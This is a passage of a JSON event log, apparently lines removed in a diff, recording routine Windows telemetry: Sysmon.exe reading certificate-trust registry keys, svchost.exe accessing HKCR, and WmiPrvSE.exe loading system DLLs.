"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", 
- "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmitomi.dll", - "image_path": "C:\\Windows\\System32\\wmitomi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": 
"c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573790420000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573790740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573790740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573790890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NetTCPIP.dll", - "image_path": "C:\\Windows\\System32\\wbem\\NetTCPIP.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 
131883573790740000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573791980000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - 
